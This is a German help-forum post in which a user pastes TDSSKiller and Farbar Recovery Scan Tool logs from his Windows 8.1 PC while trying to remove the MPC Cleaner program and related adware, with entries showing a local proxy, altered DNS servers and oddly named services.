12:55:17.0572 0x1004 [ 1CE11C53E562D5F7EAFCF47E0E696516, 4E8264DB3CA9B2344905BC2CAE6A9E73190A3CCF3D154B3CBDAF4F73F8FCD64B ] C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
12:55:17.0603 0x1004 avgnt - ok
12:55:17.0603 0x1004 Web Companion - ok
12:55:17.0650 0x1004 [ 7AFF1C22E8BC6D8181053FC3590FD0F2, 7AD0BF719597CD4770A45E16C4F45F233F99D473AA1F4F0B0FC0F8D26976F883 ] C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
12:55:17.0681 0x1004 OfficeSyncProcess - ok
12:55:17.0681 0x1004 Waiting for KSN requests completion. In queue: 155
12:55:18.0697 0x1004 Waiting for KSN requests completion. In queue: 155
12:55:19.0713 0x1004 Waiting for KSN requests completion. In queue: 155
12:55:20.0728 0x1004 AV detected via SS2: Avira Antivirus, C:\Program Files (x86)\Avira\AntiVir Desktop\wsctool.exe ( 15.0.16.273 ), 0x41000 ( enabled : updated )
12:55:20.0728 0x1004 AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.8.207.0 ), 0x60100 ( disabled : updated )
12:55:20.0744 0x1004 Win FW state via NFP2: enabled ( trusted )
12:55:23.0119 0x1004 ============================================================
12:55:23.0119 0x1004 Scan finished
12:55:23.0119 0x1004 ============================================================
12:55:23.0119 0x0278 Detected object count: 0
12:55:23.0119 0x0278 Actual detected object count: 0
|
|
29.03.2016, 12:12
| #4 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) Hier der zweite Teil: FRST - Editor Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Denny (Administrator) auf SCHNEIDER (29-03-2016 13:01:45)
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator)
Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
HKLM-x32\...\Run: [sun13] => [X]
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications)
HKLM\...\Policies\Explorer: [CDRAutoRun] 1
HKLM\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-18\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
ProxyEnable: [.DEFAULT] => Proxy ist aktiviert.
ProxyServer: [.DEFAULT] => http=127.0.0.1:51218;https=127.0.0.1:51218
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.142.70 95.211.158.149
Tcpip\..\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}: [DhcpNameServer] 82.163.142.70
Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}: [DhcpNameServer] 82.163.142.70
Internet Explorer:
==================
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF Homepage: hxxp://www.google.de/
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems)
FF Plugin-x32: samsung.com/SamsungLinkPCPlugin -> C:\Program Files\Samsung\Samsung Link\utils\npSamsungLinkPCPlugin.dll [Keine Datei]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml [2016-03-07]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-02-19]
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
Chrome:
=======
CHR dev: Chrome dev build erkannt! <======= ACHTUNG
CHR Profile: C:\Users\Denny\AppData\Local\Google\Chrome\User Data\Default
StartMenuInternet: Google Chrome - chrome.exe
==================== Dienste (Nicht auf der Ausnahmeliste) ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate)
R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [349152 2016-01-28] (DotC United Inc)
R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
S2 Arygnarj; "C:\Users\Denny\AppData\Roaming\FeykfeCekd\Nohlinbi.exe" -cms [X]
S2 Fuelf; "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh\Syyjj.exe" -cms [X]
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-01-28] (DotC United Inc)
R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation)
S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-03-29 13:01 - 2016-03-29 13:02 - 00018116 _____ C:\Users\Denny\Desktop\FRST.txt
2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt
2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt
2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe
2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-03-29 12:45 - 2016-03-29 12:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-03-28 23:46 - 2016-03-28 23:58 - 00000000 ____D C:\Users\Denny\Desktop\Infos
2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt
2016-03-28 23:34 - 2016-03-29 13:01 - 00000000 ____D C:\FRST
2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt
2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe
2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe
2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500
2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira
2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages
2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider
2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia
2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe
2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe
2016-03-22 00:21 - 2016-03-22 00:21 - 00001135 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-03-22 00:21 - 2016-03-22 00:21 - 00001123 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe
2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys
2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
